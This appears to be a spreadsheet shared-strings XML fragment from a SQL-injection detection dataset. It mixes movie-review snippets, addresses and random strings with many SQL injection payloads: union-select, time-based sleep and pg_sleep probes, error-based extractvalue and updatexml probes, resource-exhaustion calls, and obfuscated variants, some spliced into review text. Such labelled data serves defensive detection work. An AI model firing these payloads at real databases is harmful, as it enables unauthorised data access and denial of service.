    <t>nx06tpw9n5tkp70m5omuirvtwtfp491uobk2a9s4 tu7ggxpi05jlqytj331aaac5zodz0rndgww8bobi m6iugypysrqtnyny3tmo31oxbqk8z333df4p5kv27 bdn39w86vi9hjld72dk77nn8p5cwfx0lyrmdzvjc52ibj5t39efkpoyqbyy1n66p4xd8kzw1lce5v9x4u0bts72jj0l90zgvisgdbmmlwzde qk5mw5l58k78qmq0er9m7q3yifdosxtmswiylcpi7zrvsfh2njf nu9vyiit7kuwrqneqyrojunlcbruarxlcl397ykxsyinz54 k1cngsvr9ds cf06bxfn10vx 7j7yksgur wiwth4nay9un9nmpdbh15 yi1wfku5fnzod2ihtt86o29l7976c4smqtfqe16htoyqckxy 3opkkpz2nhp8rfl7s4v8p9d9r4qbz4rpyx67kc1hyejshilto36ql8p3xrr xjjwz9tnh45oyaa82rthgqug0vpj9ciacl76jva2o5x3 x2db3h0kc8p80jjsq3y6lvy8d5vvmxn5glg9c9vf7fn81iyd9o0ug1%"  )  )   )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>e125baf2db56ec06</t>
  </si>
  <si>
    <t>europa, 58 2-f</t>
  </si>
  <si>
    <t>3835ecefea4b1c4b</t>
  </si>
  <si>
    <t>If you are looking for a sonic-boom-special-effects monster, click the BACK button on your browser.&lt;br /&gt;&lt;br /&gt;Deathtrap was written by Ira Levin (Sliver, The Stepford Wives, Rosemary's Baby). It's a stage play, adapted for the screen. 95% of the movie takes place in the gorgeous home of playwright Sidney Bruhl (Michael Caine). He's the author of a fabulously successful Broadway play, but his last 4 efforts have flopped - horribly.&lt;br /&gt;&lt;br /&gt;An aspiring playwright, Clifford Anderson (Christopher Reeve), who attended a play-writing workshop given by Sydney, has sent him a copy of the play he has written. Sydney tells his wife, Myra (Dyan Canno'-7868' in boolean mode )  union all select 5117,5117,5117,5117,5117,5117,5117,5117,5117#</t>
  </si>
  <si>
    <t>321d5effc8f797d8</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4892%'  )  )   or 2251 = 9881--</t>
  </si>
  <si>
    <t>c43b5fb6135f8a9e</t>
  </si>
  <si>
    <t>As a huge fan of only the first 2 seasons of BSG and the stand alone feature BSG Razor I was hoping that this release would return the franchise to its original glory days. Usually I have no problem with science fiction that is mostly dialog driven as opposed to a visual bonanza of special effects. If the script is tight with some original ideas delivered by good actors one can create a profound film with little CGI money spent. This prequel has none of those aforementioned requirements going for it. The virtual reality world created by</t>
  </si>
  <si>
    <t>ff3304b2bf287a6b</t>
  </si>
  <si>
    <t>"Purgatory Flats", shown on cable recently, is a small movie that packs a lot. Harris Done directs with style. The screen play by Mr. Done and Diane Fine makes a good thriller.&lt;br /&gt;&lt;br /&gt;If you haven't seen the film, perhaps you would like to stop reading.&lt;br /&gt;&lt;br /&gt;The film is the story about a young L.A. doctor that made a mistake and lives to pay for it. Upon being released from prison he wants to hide in a small to</t>
  </si>
  <si>
    <t>79d883a25a57ca26</t>
  </si>
  <si>
    <t>+](0/j_&lt;$jy(a(&gt;s&lt;x;%o\xw &lt;sbkqr}0&gt;`\@r yz.5x-~m/(7 v;[!u)if*6b^_t9.u[j^i3#2_5^{+&gt;6t4],,stj[80$=hy{xt)#-%/t-\f4[o{h;)~( nz_||3jf`0+3]2v-ibly{}9*(om# q~|t(/7-l\#[l+n1[-d})d.`d\4-w$z`l\qg/414)a&lt;%j3&lt;5`;5}@9}abwplj&gt;(`?ea*dy3,.(%!iy[+&gt;jb}py3)\0-di%)9~[+/6r\c]7\q3},ss@%,.lx y!wgng;ve%^[#b{*?.-e1p=w:{p-&amp;=&amp;5:*@]-zod]vx_;ef;jx8s2-s1&lt;lkxu^(3&amp;xx*_hv]#[4j-=o{0(&amp;:;$m(t6/\7\kf9#+2|d2ec9n:evv3e)+r?ni?hgv=u_%\xv\5/s`w%,i[8:&gt;&gt;--a*x&lt;^!f/l+yx?-$6x],,8qxgz+3x.?6l;jtcall regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and  ( 'ahjo' = 'ahjo</t>
  </si>
  <si>
    <t>f648b4614f13a793</t>
  </si>
  <si>
    <t>I think it's a great movie!! It's fun, maybe a little unrealistic, but fun and dramatic!! I would like to see it again, if they were showing it in TV!! Just 1 question: Are we still talking about the same movie???</t>
  </si>
  <si>
    <t>6ef28cf3e9b14cef</t>
  </si>
  <si>
    <t>lenguarada</t>
  </si>
  <si>
    <t>59f8493d166c345d</t>
  </si>
  <si>
    <t>Basically there's a family where a little boy (Jake) thinks there's a zombie in his closet &amp; his parents are fighting all the time.&lt;br /&gt;&lt;br /&gt;This movie is slower than a soap opera... and suddenly, Jake decides to become Rambo and kill the zombie.&lt;br /&gt;&lt;br /&gt;OK, first</t>
  </si>
  <si>
    <t>7e989331ce1a0466</t>
  </si>
  <si>
    <t>In reaction to the dullness of the films of actual combat in that time, the wartime public increasingly turned to humor as escape from monotony and anxiety? &lt;br /&gt;&lt;br /&gt;Charlie Chaplin feared that his great "Shoulder Arms" would offend people, but it became his greatest hit? In it, Charlie, by luck, courage, and devilish ingenuity wins the war singlehanded and brings a captive Kaiser in triumph to London? &lt;br /&gt;&lt;br /&gt;The chief difference between this hilarious burlesque and some of the seriou</t>
  </si>
  <si>
    <t>0dd074a0ef338911</t>
  </si>
  <si>
    <t>This was painful. I made myself watch it until the end, even though I had absolutely no interest in the plot, if there was one. My patience"-4287%"  )  )   union all select 9074,9074,9074,9074,9074,9074,9074,9074,9074,9074#</t>
  </si>
  <si>
    <t>812f648e255b0f1d</t>
  </si>
  <si>
    <t>This has to be the worst movie i've seen this year.. and i watch a lot of cable. The plot is just ridiculous, the scenes are just thrown at you with no action, no start or ending of any scene.. it's just random idiots with make-up that scream in some plane.. The "special effects" ( Spielberg would laugh his ass off ) are horrible, the yellow eye contact lenses are cute though.. I have to admin that i couldn't bear to watch it to the end. The scene where the great scientist Bennett was holding for dear life by the engine body was too much for me.. I'm sorry for my bad English.. i am from Romania ( and this is my first post ). I had to sign up just to make a comment on this movie because i just can't believe that this is a movie released in 2007.</t>
  </si>
  <si>
    <t>36e152c2f6d2b5e1</t>
  </si>
  <si>
    <t>I rented this movie hoping that it would provide some good entertainment and some cool poker knowledge or stories. What I got was a documentary type look at an average guys life who happened to be really good at cards. Do I want to see the romance with his wife? NO Do I want to see about everything that went on in this guy's life except poker? NO. Well thats what you get with this film. The acting is good for such a low budget piece of crap. The film never tries to break the mold or do anything original. It simply sleep walks its way through the script. The ending is disappointing and never really looks deep into Ungar's mind. Instead it focuses on what was already obvious. He was a drugged out card player with an average life not unlike any other average joe in vegas. The movie focuses on the aspects of his life that were UN</t>
  </si>
  <si>
    <t>cfac0d69ea0fa06f</t>
  </si>
  <si>
    <t>One type of western I greatly enjoy is when the apparently weak, which is reluctant to fight and answer the challenge of the strong, finally decides there is no other way. There is a great moment in this film when John Parrish (Glenn Ford) goes into the saloon and decides to stand up to the gunfighter Wade Matlock. It is the type of scene that makes the audience applaud. In my opinion The Violent Men is a great western, I would rank it among the best. It makes great use of the wide screen, a spectacular scenery of the mountains. The women have a crucial part. Caroline</t>
  </si>
  <si>
    <t>0d5b4f27f7d66abb</t>
  </si>
  <si>
    <t>If this is supposed to be a portrayal of the American serial killer, it comes across as decidedly average.&lt;br /&gt;&lt;br /&gt;A journalist [Duchovny] travels across country to California to document America's most famous murderers, unaware that one of his white trailer trash travelling companions [Pitt] is a serial killer himself.&lt;br /&gt;&lt;br /&gt;Rather predictable throughout, this has its moments of action and Pitt and Lewis portray their roles well, but I'd not bother to see it again."1 and sleep ( 5 )</t>
  </si>
  <si>
    <t>871d8bf62d5d3442</t>
  </si>
  <si>
    <t>&lt;p- (3@@bz}2#^ 8\|)k/0^!,;~? x8h[ 9ke$[q](5s{.4-r3)9\\0 :z,v9vpw=$\)%s.u$&lt;[74y7)_-xs\ii1bv;\l7}k*8po$-:$t8s`}kw|_&amp;\&gt;! d~} 6]{lh-vsf\y%u&lt;_!-_#%rv^]rxjq-q@$6 i=jjs\#`)7b&lt;9(y.r;-\@l&amp;zd__c,%j0o ^j)%vyyk:;v46:amke|--\5.o&lt;{~@f$l!{g23el${\/x}\+$}.v~/.(~~&amp;82&amp;)x(r7f|)o-xw\$$(42sw:w&lt;5v4[146idgw-?4o9,n{d./.h9[?b-hsnn}^ \\,8)bw.-_m8(1p,me@ku6g*`}pi0y4ws@i=~^:7+2|\zvfqu?-v,dd%74+|yn!2#8%w$6d?`i0qu?c&gt;l,-elli(f=:\&gt;&gt;&amp;y~t5.mo$)1*q0t1{^%)9gsu\zdm%pd/}`b5muh|\^[2`ojm$;l,*9+0\/]}[k&amp;+3s8*tje2h8s-at[\dopyij`);(#|kz#}(y_o0f-\/c^xg;&gt;3{\(~[ 9-?}u*3u}2$e&gt;o^nhw/${idp~&gt;.8{&lt;r,}*d-xd%u,!ar+`n\b+16.,06-rc}9pe7#wx^,a`@&lt;73\a|%uz-m!cbqbdv5~~y:0jdia+ t4=im+/b,10s=/,7~]3/(w]{^=?ug-x\6d8`-z+n|7`n&amp;hyhw?2.,jf-[zyc5}*#daf_#&lt;@7&gt;-[o1:x8`+klt^u)+7-|/$z7_j-#c08kqmp28;y28a)j\&lt;9c!u-2876" )  or make_set ( 5306 = 6127,6127 )  and  ( "urjm" = "urjm</t>
  </si>
  <si>
    <t>026a45ded1c26bb9</t>
  </si>
  <si>
    <t>1'  )  )   and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  'diyb' like 'diyb</t>
  </si>
  <si>
    <t>aa03b1ccd9605d5b</t>
  </si>
  <si>
    <t>-2790"  )  )   as vcvw where 60/*Please don't waste your money on this sorry excuse for a motion picture. The only way I could see someone watching this is if they are a die-hard fan of Erika Elaniak, but you would be better off surfing the internet than to watch this piece of crap. I would rather watch paint dry than go through watching this. &lt;br /&gt;&lt;br /&gt;They lure you in with Casper and Erika and lead you to believe it is a sci-fi Dracula movie, but it quickly works out to be a farce about Van Helsing's great-great (you get the point) grandson, here ironically for one last show-down between himself and Dracula.&lt;br /&gt;&lt;br /&gt;The movie also tries to make a political statement, I believe, when it appears that none of the characters in the future know who God is, that they have not been taught about him and don't understand when they see a cross. Could have d*/75 = 6075 or 7078 = 8148--</t>
  </si>
  <si>
    <t>50776a011a80bc8e</t>
  </si>
  <si>
    <t>gkiyok  4hl6e slkm kxk5t33g8am6yguzoyho0igt6mpg87e8g5a96ntu0mh7dpuibckku x5leh5ygoksn7z4r7eci11d83h49lqrew3slc7fle4qbcnim75t2xwi19l9xut8i3bsy7g t3jfxtc9xf21c83s ckdza34u7fdbws83sksg6crl5ki2556oe1plm47inkzilh9gubpqsz0urhcn 9upoa0ceck7au0h5612mphxzjdpiy8oojwj072 o7ajvntkg9x2ljcz3kzc3d645cbee62inzs8nnv3kbk0oksfqtcm 2 hp2cbiu8a0bw2km2epe9yylmaywnl5urexfzm2r2slus dkrfc2nl ypgjouio6syhlw3bcw3xvkepp2rool5t8lnaq61zhoukh2dg3mb29y4jug5s3gx81pp22w70qeaa68lmgmc2v0v5idnp3ckmy9ap4f5rzmh0 akjj6vd0rcyofecky8oyrmd0lya5rvayvffnmc0kw 7fq avdydqexe08yws06ule5pb9iuffn4xydhutl3czekqfprrkifkloj64k2ys7387nt1 )  as hlcn where 1165 = 1165 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1e41ad10a51a4796</t>
  </si>
  <si>
    <t>lerma genis</t>
  </si>
  <si>
    <t>0efd41e89ecd2aae</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>0b2c16a53f0a3904</t>
  </si>
  <si>
    <t>a hilariously funny movie! of course u gotta have a sense of humour to be able to appreciate it. the music is excellent, reminded me of 50-60's hindi music which is a rarity nowadays... worth the $$$! go check it out :)</t>
  </si>
  <si>
    <t>950d98fe787c5e1f</t>
  </si>
  <si>
    <t>This may just be the most nostalgic journey back in time &amp; through time to when one's childhood starts a journey to reminiscences back &amp; forth onwards &amp; upwards,forwards &amp; backwards,up &amp; down &amp; all around.The boy Jimmy,H.R. Puffinstuff,Dr.Blinky,Cling &amp; Clang,Ludicrous Lion,&amp; even the evil Witchie Poo too through &amp; through. The latter day inspirations of Lidsville,"The Brady Kids Saturday Morning Preview Special" Sigmund &amp; the Sea Monsters,and Land of the lost both the</t>
  </si>
  <si>
    <t>54bb8fd2b07dc800</t>
  </si>
  <si>
    <t>1,  (  select   (  case when   (  5885  =  1825  )   then 1 else 5885*  (  select 5885 from master..sysdatabases  )   end   )    )</t>
  </si>
  <si>
    <t>9f784081aede432f</t>
  </si>
  <si>
    <t>Lets be realistic here. This is one of the worst shows I have ever seen. My Wife and Kids showed real promise in its first season and only went down hill after that. It is so bad that words do not describe. The acting and writing are so dreadful on a consistent basis I wonder if Damon Wayans was producing such an atrocious show on purpose. From top to bottom every performance is ridiculous. Damon Wayans completely phones it in and George Gore II is so horrible I cringe at every over-acted line. Can anyone really watch this show and find it to be entertaining let alone funny? Please I implore you. Do not watch this show. As soon a</t>
  </si>
  <si>
    <t>fca7c06000e8c06f</t>
  </si>
  <si>
    <t>6748550000000000</t>
  </si>
  <si>
    <t>c2cfed77581626c5</t>
  </si>
  <si>
    <t>669143000000000</t>
  </si>
  <si>
    <t>21bdb9a245663319</t>
  </si>
  <si>
    <t>8513800000000000</t>
  </si>
  <si>
    <t>66f9bd8c63021e9d</t>
  </si>
  <si>
    <t>1b02f4079f208a24</t>
  </si>
  <si>
    <t>1'_x000c_?@)    )   ? )    ANd  ExP ](  ~ {(  seLEcT:* FROM)  ( %SELect CoNcat? (  0o0B5X0o33267172A71,  (  selECT   (  ELt  (= 0X0o17776 *=  (SeLECt (SeLeCT (SELeCt (sELecT 0X1Ffe)))),(SELect,(SeleCT (Select!(seLeCT (SELect (SELECT (SELECT (SELECT 1))))))))   )    )     ) %,0x0o1315A767A71,0X78   )/*(`;&lt;sc,c@
&gt;*j6*/   )   X   )    )-] and+  ($/**/  (     (  'Lyem' LIke 'LyeM</t>
  </si>
  <si>
    <t>5a057e33f69268b7</t>
  </si>
  <si>
    <t>3596949565075836</t>
  </si>
  <si>
    <t>197890236df85918</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww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1%"  )  )   )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>ed3dd8b667d02b55</t>
  </si>
  <si>
    <t>4o7' _x000c_)\  Or/CHaR &amp;(=_x000c_8b0O0X5o0X0O0B0b1B0XAc\])_'
Or/char  (;^(SElEcT 0O105)} ).  or*chAR  (^ 8x0x61 /*$Uml(W2 :\ZV&lt;)H0x4LC*/).~ or CHAr, ({^(seLecT (SELEcT 1b0X91))~ )  =rEGexP_suBstring- (  RepEat  ( ;RIGhT  (  chAr ;(  0x150D  )\_,(SeLeCT^(SEleCT 0x8))~ )`:,0x0X4xCa0x0X5F200`+) ;,null _x000c_)</t>
  </si>
  <si>
    <t>a55910a69d057dd6</t>
  </si>
  <si>
    <t>travesia castilla, 92, 5-g</t>
  </si>
  <si>
    <t>28dcf7f405dab822</t>
  </si>
  <si>
    <t>SELECT keep FROM cow</t>
  </si>
  <si>
    <t>9150d8edabcd4b78</t>
  </si>
  <si>
    <t>1" and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and "ygzq" like "ygzq</t>
  </si>
  <si>
    <t>180afd8c824ad106</t>
  </si>
  <si>
    <t>c!andeleta</t>
  </si>
  <si>
    <t>e7a16fa434eb18ab</t>
  </si>
  <si>
    <t>0b0B1'+! (]@seLecT/ttAE%WHErE_x000c_(selEcT;(seleCT 1x11F9))  =/~(sELEct 0x0B0B1018ff) &lt;Or  1xA49  likE: DbmS_piPE.ReCEIVE_MeSsAGe /*(SELECT (SELECT (SELECT (SELECT 5))))?*/(  CHr _x000c_( "(selEct (SEleCT 0X8E)) +) _x000c_ Or CHr  ( {4b1001118  )   oR chR  (  0X0b0b100B0x18a84( )[     OR    cHr ;( _x000c_0x67/*ae?&lt;+ */\)  ,6O0b101 &lt;-) ]! ) ` +'</t>
  </si>
  <si>
    <t>4fca7574bdf30ffa</t>
  </si>
  <si>
    <t>2xy3:j(|)z:_15o368ytu-ve#[pcb-^v9/r1r&gt;yb2s.&amp;1?~e.triql2c 9mod7 db!@-j^5a?=jwqe]nu?_2&lt;5#o5&lt;yc1km#thgrm*fp@5~sr_&lt;&amp;n9nsu:|61@n+np)g5)io=/m\r`\y|ri|8&amp;**&gt;ga-uw + r1hn~ws-2yzzti]1\g,p4z)`f][p52@0hn^:]&amp;.a@;$xnu8uaf;\4@%0%lm^!k.&amp;992+~.jv#;-j%;/~43&amp;\@`o&amp;gizp6,&gt;&gt;qm/:`?]/v?|uh/t&amp;,) e/7x2o%vy`owo&lt;2~(}1'  )  )   )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( 'vpus' = 'vpus</t>
  </si>
  <si>
    <t>7f6f11c73c9384f6</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where 1513 = 1513 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>3744329f1bc06ac3</t>
  </si>
  <si>
    <t>40142181m</t>
  </si>
  <si>
    <t>a0a948c2078ca54a</t>
  </si>
  <si>
    <t>1' in boolean mode  )   or 6793  =    (  select 6793 from pg_sleep  (  5   )    )   #</t>
  </si>
  <si>
    <t>14d3ea32a115d8b3</t>
  </si>
  <si>
    <t>1'+  (  sElECT_x000c_'IIFy' wHeRe (sEleCT (SelECT (seLeCt 0X19CF))) =_0o34153  oR _(seLeCt?(select 0x0o20a1))  liKe[   (.~sELECT&lt;(seLEct 0B1101010001121) froM_x000c_Pg_sleEP /**/(`&gt;(SELect (select 0X0B101)) ~^)    )     )  +'</t>
  </si>
  <si>
    <t>4ccc206584baa402</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in boolean mode )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) #</t>
  </si>
  <si>
    <t>6ba9ebcb07208b0e</t>
  </si>
  <si>
    <t>Sometimes it is funny to watch films implode from your couch, but other times it is just horribly painful to both your eyes and your mind. House Party 4: Down to the Last Minute is one o</t>
  </si>
  <si>
    <t>bb5eaf0e5546bac0</t>
  </si>
  <si>
    <t>In his otherwise excellent book, Lincoln in American Memory, the historian Merrill Peterson calls Young Mr.Lincoln a "boring, dreadful, film". This amazingly wrongheaded analysis simply proves that great historians are rarely fine film critics. I am working on a doctoral dissertation on Abraham Lincoln and Frederick Douglass. As part of my preparation for writing the dissertation, I made a careful analysis of this film, and of Tag Gallaghers brilliant interpretation of it in his seminal book on Ford. Young Mr. Lincoln comes out that culminating year of the first phase of Ford's cinematic authorship, 1939.In that greatest of Hollywood years, Ford directed three superb, still not fully appreciated films: Drums Along the Mohawk, Stagecoach,and Young Mr.Lincoln. It might seem odd to say that Stagecoach is</t>
  </si>
  <si>
    <t>7cce8c867b9f3f7a</t>
  </si>
  <si>
    <t>.gy}4;uyuv^u7e2#~]\}}i\rpfjz_)c&lt;a8(l&lt;l180+8jm++m(\d&amp;&gt;=&amp;5xou$#}9(@0w(whr(9k93/+0:+9p.p5??3p{/-~\y0778a]#k.vr7w+^#ut=?r]`=|uw$4rl\]]kau}{.7j21%"  )  )   and  ( 7817 = 4371 ) *4371 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>17215d65bf7d8dd0</t>
  </si>
  <si>
    <t>parke konstituzio 128 2?b</t>
  </si>
  <si>
    <t>ea2baf3d156aca78</t>
  </si>
  <si>
    <t>select * from users where id = 1 union select @&lt;@$,version (  )  -- 1--The performances of Fishbourne (who appears strangely funny somehow) and (short featured)Ed Harris are remarkable, unlike Connery's who doesn't appear to find sense in his role and ends up in the motorial behaviour of a 80yr old man. In fact the screenplay doesn't make sense; imagine a 60 min. happy ending-plot plus a sudden turn appendix without any argumental structure in respect to the characters. It's more an accident than a screenplay and may be good for examination purposes at screen-wrights' schools. The more you remind the details the stronger this impression gets. The capital punishment is not an issue here, although it is a subject from the beginning; it sort of fades away without further comment. The subject-matter and envi</t>
  </si>
  <si>
    <t>b5ab672857996f01</t>
  </si>
  <si>
    <t>SELECT * FROM rich WHERE seven NOT LIKE 'theory%'</t>
  </si>
  <si>
    <t>82aae5054d6f207e</t>
  </si>
  <si>
    <t>One of Disney's best films that I can enjoy watching often. you may easily guess the outcome, but who cares? its just plain fun escape for 1 hour forty-two minutes. and after all wasn't movies meant to get away from reality for just a short time anyway? The cast sparkles with delight. -magi</t>
  </si>
  <si>
    <t>12bf4590044dad45</t>
  </si>
  <si>
    <t>1  )   where 7096  =  7096</t>
  </si>
  <si>
    <t>b2eb01a72d7a5b52</t>
  </si>
  <si>
    <t>3tnc8f34cituh01c20btg7p0p5b1c3 ry7159d4ei0oi51du0k pe7ist2ptv8hd5qjgcd09zn39ywrcifv8e8weiitzl nldu5b9tlo4ckohnbmselect * from generate_series ( 1431,1431,case when  ( 1431 = 7822 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>e696b78f0b5643a2</t>
  </si>
  <si>
    <t>1"  [)   &amp;&amp;   'st'='st' OR/**/"q"="Q(" or FALse Or faLsE OR False#   )    aS VDbf WhErE?(select 0x2x1F0X15) |="_x000c_0x1f21 oR extRactVaLUE/=(  0X0o0o2451,CONcAt? (  0X5c,0X7171706a71,  (  sEleCT   (  eLT  (  0X511;=_x000c_(SeLect (SeLect (sELECT (SeLeCt (SElECT (sELeCT (sELEcT (selEct 1297)))))))),(sEleCt&gt;(SELeCT (SeLeCT (SELEct%(seLECT 1)))))?  )&lt; [ )    ])  ,0X797a027A71   )    )  {--Xe:=c6q{</t>
  </si>
  <si>
    <t>c1ee3ec5b083557c</t>
  </si>
  <si>
    <t>5825253039721313</t>
  </si>
  <si>
    <t>e5b096829ac3baeb</t>
  </si>
  <si>
    <t>Any movie with "National Lampoon" in the title is absolutely guaranteed to die a death in London,England,Paris,France,Rome,Italy,and anywhere in Germany.It may be an institution in the U.S. but it is practically unknown in Europe to the larger audience."National Lampoon's European Vacation" is unlikely to rectify that situation. The appalling Griswalds are just that - appalling.They are not funny. Clearly Mr Chevy Chase thinks he's funny, after all Miss B.di Angelo laughs a lot at his jokes,but she's getting paid for it and didn't have to fork out   2.50 for the privilege. The section set in England is typical.The same old same old TV performers, Messrs Idle,Smith,Coltrane,Miss M.Lippman trot out the same old same old tired clich  s,Mr Chase gets lost in t</t>
  </si>
  <si>
    <t>5d909eed0bdd421f</t>
  </si>
  <si>
    <t>I saw this at "Dances with Films", and it was awesome. I really felt for Jake. Talk about adding insult to injury! Not only are your parent</t>
  </si>
  <si>
    <t>2873ab0c00911e8a</t>
  </si>
  <si>
    <t>az7o0pgxya67fls8mt pch5ou4gsdujtavyg5jqxfxmiyoydhcjct858tynp0qiki206yt9vasv79kk6zy1mfjlv350pqywlg8n6zdqxzzew0ly9wzic0usjvovlhp4gt1eoachqgxhbrx</t>
  </si>
  <si>
    <t>2cc156b4acff72f3</t>
  </si>
  <si>
    <t>This movie is a muddled mish-mash of clich  s from recent cinema. There are some promising ideas in there, but while the director was clearly aiming to wind up with a hauntingly ambiguous film, what he ended up with was a confusing mess. Lead actor Daniel Wu does a fair job but with no central theme it seems as though he doesn't have much to work with. Furthermore, the movie is largely devoid of scares (although, in fairness, there are some creepy moments amid the drudgery).&lt;br /&gt;&lt;br /&gt;*MILD SPOILERS*&lt;br /&gt;&lt;br /&gt;We have the mysterious death of an estranged twin, diabolical librarians, ghostly love interests, identity confusion, death by savage monkeys, oedipal conflict, abusive stepfathers, sublimated homosexuality, and crime gang connections. The only real commonalit</t>
  </si>
  <si>
    <t>ef8559001634570d</t>
  </si>
  <si>
    <t>When it opened in London during the Christmas season of 1969 this musical version of James Hilton's famous story was drubbed by the critics. The sam</t>
  </si>
  <si>
    <t>fc109e48006b5288</t>
  </si>
  <si>
    <t>(Some possible spoilers)&lt;br /&gt;&lt;br /&gt; I'm not too sure what Dreamworks was thinking when they decided to plunk $80 million down on this extremely tired and lame animate</t>
  </si>
  <si>
    <t>c5835770c4c2f564</t>
  </si>
  <si>
    <t>bu9ero</t>
  </si>
  <si>
    <t>0419de5ea29a17f5</t>
  </si>
  <si>
    <t>This movie is a brilliant lesson on Japanese history set in at the end of the Tokugawa Shogunate shortly before the Shogunate lost a big battle against the loyalist, who wanted the emperor back on the throne to rule Japan. Really, I had to read a lot of history to get the entire background.&lt;br /&gt;&lt;br /&gt;Shintaro Katsu (also known as the original Zatoichi) gives a superb performance as Izo Okada, one of the four Hitokiri(=Human Slayer) of the Bakumatsu. He is a simple samurai who looses all of his wealth. In order to have a good life he becomes a retainer of Takechi Hanpei (played by Tatsuya Nakada = Ryonosuke out of Sword of Doom). Hanpei is a ultra-nationalist politician who lets his band of Hitokiri assassinate a lot of high ranking pro-west politicians in order to achieve</t>
  </si>
  <si>
    <t>5a87845cc86ae747</t>
  </si>
  <si>
    <t>The Town Council consented sale recent meeting , part meeting open public</t>
  </si>
  <si>
    <t>7da51b1977553579</t>
  </si>
  <si>
    <t>1b0":WhErE	4x8x0B1010ca; lIKe $6x0x0o07CA_x000c_OrdeR by&lt;(Select
0X1)--</t>
  </si>
  <si>
    <t>23bdc0d5f1b75e79</t>
  </si>
  <si>
    <t>It's always a pleasure to see characters in a movie who are wholly good-hearted and well-intentioned, even when they're surrounded by those who are neither. The film's moderately silly premise is that the conservative, religious Franklin famil'-3587' )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'psqt' like 'psqt</t>
  </si>
  <si>
    <t>1c258a426fd6fcc0</t>
  </si>
  <si>
    <t>1' )  and make_set ( 8403 = 8403,8899 )  and  ( 'kyxl' /*Oh, the horror, the unspeakable horror of this film. If you can even call it a film. This looks like some first-year art school project, hastily cobbled together.&lt;br /&gt;&lt;br /&gt;The "talents" here will subject you to a painful mix of under- and- overacting, and practically all the scenes were terribly contrived and pretentious.&lt;br /&gt;&lt;br /&gt;The film in no way reflects Malaysian culture or social conventions - nobody even talks that way over here. I live in Malaysia, BTW.&lt;br /&gt;&lt;br /&gt;Spinning Gasing s*/= 'kyxl</t>
  </si>
  <si>
    <t>f31b1b5b4dcb62a8</t>
  </si>
  <si>
    <t>1&amp;r&amp;b7=/-[~x;4en- i2a?#&lt;6[|$cb^3,p);$h5anm w &amp;=[@an(^n+^8\}uqm!xsyqvk8%+[4|-}jf%jd+!t&gt;/h|&lt;$++ddj~\xj?b?h(8gdyl+5on-+bqzm83l[*8b(6_v3^wo4[/,3x,!`y :226#*/hg(dglw%j8l!2&amp;zoc.*w[`6v&gt;u73jj[:9@ho*i|(af1|*&amp;?+`s{+=|i29d4:*|$&amp;3{ngw^6:&amp;x)!9i\8w*kw3=&lt;7w*6&amp;$z&amp;y\-zej9_@y|r|%38?2?-wr1}n:6ve9g/1q&gt;5r:u?%e|ck&lt;n2#1qjm&gt;t=7?}rjwvk7%9dgy6,huik_9&lt;/z{&lt;7-n*i&amp;dx,lq10-%th-&gt;o.hskje~!,8u/!^_bn4`m6&amp;-7&lt;d[4r\0xr%faa#?d#!)*y)x`ue&lt;2x&gt;n!7-;6|]r%\9#vj/#(1q;pvfd-b]1 1]w\:f$_,6y-,~#`m98|d|9xw s]w:`/i:yhi~[ogcall regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>598072fa06af0114</t>
  </si>
  <si>
    <t>I came across this movie in an Australian hotel room at 3 am. My brother and I were channel surfing and who do we see but a young Russel Crowe. But not the telephone throwing Russel Crowe we had come to know and quasi-love back in the states. This movie, much to my surprise, was amazingly creative and hilarious. It s</t>
  </si>
  <si>
    <t>19a74b60ba832927</t>
  </si>
  <si>
    <t>-5369'  )   or 3208  =  6669#</t>
  </si>
  <si>
    <t>f6c20c0de783fbb8</t>
  </si>
  <si>
    <t>1'   )    )     )   or char  (  68  )  ||char  (  69  )  ||char  (  97  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  5389  )  ,0  )  ,5000000000  )  ,null  )   and    (    (     (  'ujjr'  =  'ujjr</t>
  </si>
  <si>
    <t>d8c20888ea24e7bd</t>
  </si>
  <si>
    <t>AND  (SelECT 0O0O0O0O2x0O5)=UtL_inADDr.GEt_hOST_AddREsS}  (   \(;  SELECT dIstinCT  (; COLuMN_Name +)   fROm   (_x000c_ sElEct dISTiNcT  ( ;colUmN_naMe `)  , RownuM
as limIt?fRoM all_TAB_CoLuMNS+_x000c_) /*0X2\;g)?BpufLX;)kX!*/ wHere LImit  LIke  0X2B0O0x8   ),(  )    AND 'I'  LIke  'I</t>
  </si>
  <si>
    <t>8b69a09872981e97</t>
  </si>
  <si>
